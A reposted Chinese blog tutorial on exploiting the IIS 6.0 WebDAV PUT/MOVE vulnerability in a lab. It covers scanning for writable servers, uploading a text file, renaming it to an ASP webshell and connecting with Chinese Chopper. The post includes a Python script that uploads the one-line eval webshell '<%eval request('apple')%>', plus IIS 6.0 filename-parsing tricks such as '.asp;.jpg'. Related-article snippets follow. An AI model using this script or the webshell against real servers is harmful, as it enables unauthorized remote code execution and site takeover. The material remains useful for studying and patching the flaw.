IIS6.0PUT漏洞的利用

最新推荐文章于 2024-04-16 12:00:12 发布
最新推荐文章于 2024-04-16 12:00:12 发布
阅读量1.1k 收藏
点赞数
文章标签: shell python
原文链接:http://www.cnblogs.com/qianxinggz/p/11440278.html
版权

title: IIS6.0 PUT漏洞
tags: 环境配置,漏洞利用
grammar_cjkRuby: true
---

一、IIS6.0PUT漏洞的利用

演示:
转载自:https://www.2cto.com/article/201311/259656.html
利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。

具体的原理: http://www.2cto.com/Article/201307/228165.html

为了验证是否是webdav组件的问题,我们现在把webdav禁用掉,立刻就会在put下面显示NO,这就是因为IIS PUT SCANER通过webdav查询的时候查不到PUT了。
1516646-20190831201349520-516272716.png
1516646-20190831201408264-323759925.png

为了下面的实验,先把webdav打开。然后利用桂林老兵的iiswriter
1516646-20190831201419039-1529968513.png

然后提交数据包,会在服务端生成一个1.txt的文件,但是这个文件是无法被iis解析的,所以要利用到的是MOVE,主要目的是为了将txt的文件修改为asp的,从而可以将文件变成可执行的脚本文件。
1516646-20190831201430299-1200286725.png

1516646-20190831201441107-2118408898.png

验证一下,确实存在shell.asp文件
1516646-20190831201459852-1665725945.png

用菜刀链接
1516646-20190831201512221-926197560.png

菜刀成功连接
1516646-20190831201525570-1982378676.png

二、IIS6.0PUT漏洞的利用槽点
1.利用思路总结:

首先PUT(txt)数据包到服务器端,然后利用MOVE方法将上传的数据包脚本更为shell.asp。再访问该脚本即可

2.环境配置:以上是理想情况,实际环境中需要服务器端具备以下前提

IIS6.0写权限开启
IIS6.0允许访问脚本资源权限开启(也可利用解析漏洞解决)
IIS6.0的webDAV扩展设为允许

3.利用途中可能产生的问题

PUT asp脚本到IIS6.0会返回404
所以只能PUT IIS6.0不能解析的文件,如jpg,txt格式

未开启写权限时返回403
在属性中的主目录下开启写入权限

以上权限配置完后PUT脚本显示401
(猜测:服务器的安全配置)
这一步没有思考到解决问题的思路,通过搜索关键字IIS 得出
win系统的network用户 权限管理需要设置读取和运行,写入

返回状态码207代表利用成功
但是如果未开启脚本资源访问权限,则实际并没有更改成功(返回未207)

三、IIS6.0PUT漏洞的利用脚本--python
#encoding="utf-8"
import requests

#分别需要put,move的url
put_url = 'http://192.168.111.139/2.txt'
move_url = 'http://192.168.111.139/2.txt'
move_headers = {
    'Destination':'http://192.168.111.139/shell9.asp'
}
#put的脚本
put_data = "<%eval request('apple')%>"
#最终的连接脚本,但似乎连接不成功
post_data = {
    'apple':''
}
try:
    response = requests.request('PUT',url=put_url,data=put_data)
    if response.status_code == 200:
        response = requests.request('MOVE',url=move_url,headers=move_headers)
        if response.status_code == 207:
            response = requests.post(url='http://192.168.111.139/shell9.asp',data=post_data)
            print(response.content.decode("gb2312"))
        else:
            print(response.status_code)
except:
    pass

顺带复习下IIS6.0的解析漏洞
IIS6.0解析漏洞分两种
1、目录解析
.asp命名的文件夹里的文件都将会被当成ASP文件执行。
2、文件解析
.asp;.jpg 像这种畸形文件名在“;”后面的直接被忽略,也就是说当成 .asp文件执行。
IIS6.0 默认的可执行文件除了asp还包含这三种 .asa .cer .cdx

参考:
https://cloud.tencent.com/info/bb174aee9d971192fa38127e48aadc8b.html
https://www.webshell.cc/4294.html
https://www.2cto.com/article/201311/259656.html

转载于:https://www.cnblogs.com/qianxinggz/p/11440278.html

a6831115
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IIS6.0漏洞学习-PUT漏洞和短文件名解析漏洞
willow_liang的博客
10-20 611
简介 IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。最初是Windows NT版本的可选包,随后内置在Windows 2000、Windows XP Professional和Windows Server 2003-起发行,但在Windows XP Home版本_上并没有IISIIS是一 -种Web (网页)服务组件,其中包括Web服务器、FTP服务器、 NNTP服务器和SMTP服
IIS PUT Scaner
08-23
IIS PUT Scaner
iisputscaner.zip
01-11
IIS PUT Scaner
IIS-PUT文件上传漏洞
2301_77315080的博客
10-17 474
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞IIS,此漏洞主要是因为服务器开启了WebDAV的组件导致的可以扫描到当前的操作,具体操作其实是通过WebDAV的OPTIONS来查询是否支持PUT。根据put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源,所以我们可以利用put直接对网站写shell。上的文件夹,该扩展也存在缺陷,可以被恶意攻击者利用,直接上传恶意文件。
IIS PUT漏洞
weixin_48182463的博客
10-17 246
根据put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源,所以我们可以利用put直接对网站写shell。而IIS Server 如果在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,结合put协议就会造成任意文件上传漏洞
IIS6.0 put文件上传GetShell
yy
05-24 1643
IIS服务器开启了webdav服务扩展,又设置了来宾账户对web目录拥有写入权限时,可以被恶意攻击者利用,直接上传恶意文件。
[WEB安全]IIS-PUT漏洞
baguangman5501的博客
08-03 778
目录 0x00 IIS简介 0x01 Put漏洞造成原因 0x02 实验环境搭建 0x03 需要用到的工具 0x04 IIS-PUT漏洞演示实战 0x05 常见请求协议 0x06 漏洞修复建议 0x00 IIS...
文件上传之IIS—put漏洞
一个普普通通的博客
03-16 4362
iis—put漏洞
IIS PUT
diqi0762的博客
04-22 278
测试版本:IIS6.0 利用工具 1、IIS PUT Scaner By ZwelL 2、桂林老兵IIS写权限利用程序 ---------------------------------------- 1、IIS来宾用户对网站文件夹有写入权限 2、Web服务扩展:WebDAV—打勾 3、网站主目录:写入—打勾(可PUT) 4、网站主目录:脚本资源访问—打勾(可...
中间件解析漏洞 - IIS6.0
qq_49433473的博客
05-18 1785
中间件解析漏洞 - IIS6.0 —(文件上传之IIS6.0解析漏洞
iis6.0-put漏洞
m0_65150886的博客
10-17 259
根据put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源,所以我们可以利用put直接对网站写shell。而IIS Server 如果在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,结合put协议就会造成任意文件上传漏洞
IIS6.0解析漏洞及修复-01
09-15
IIS6.0解析漏洞及修复-01
IIS6.0上传漏洞伪静态规则
11-21
IIS6.0上传漏洞伪静态规则,含伪静态组件
IIS6.0 日志不实时解释
09-30
如果在IIS6.0中启用了日志记录,并使用W3C扩展日志文件格式,查看日志时你会发现记录的时间总是比本地时间晚8小时
iis6.0 dns
01-29
iis6.0 dns iis6.0 dns
第24课 iis解析漏洞利用
07-04
iis解析漏洞利用,通过学习文档内容,熟悉并掌握 IIS 写入漏洞利用工具的利用方法,了解具体的功能内容,亲自实践操作,并根据课程需求完成相关任务。 工具功能说明 IIS 写入漏洞利用工具是由桂林老兵写的一款...
shell变量类型
最新发布
2301_76371717的博客
04-16 173
小结:
武林风云之一个shell同时维护多个设备
qq_43161960的博客
04-14 676
使用linux工具,可以使用一台设备同时维护多台设备,可以一键部署。
shell中如何将小写字母转换为大写?
码不停歇的博客
04-14 107
Shell脚本中,将小写字母转换为大写字母可以通过tr命令或awk命令来实现。
iis 6.0 web服务器的安全设置
03-16
IIS 6.0 Web服务器的安全设置包括以下几个方面: 1. 确保操作系统和IIS 6.0都是最新版本,并且已经安装了所有的安全补丁和更新。 2. 禁用不必要的服务和功能,例如FTP、Telnet等,以减少攻击面。 3. 配置IIS 6.0的身份验证和授权,确保只有授权用户才能访问网站。 4. 配置IIS 6.0的IP地址和端口绑定,限制访问来源。 5. 配置IIS 6.0的日志记录和监控,及时发现异常行为。 6. 配置IIS 6.0的SSL证书,确保数据传输的安全性。 7. 定期备份网站数据和配置文件,以便在遭受攻击或数据丢失时能够快速恢复。 总之,保持IIS 6.0 Web服务器的安全设置是非常重要的,可以有效地保护网站和用户的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值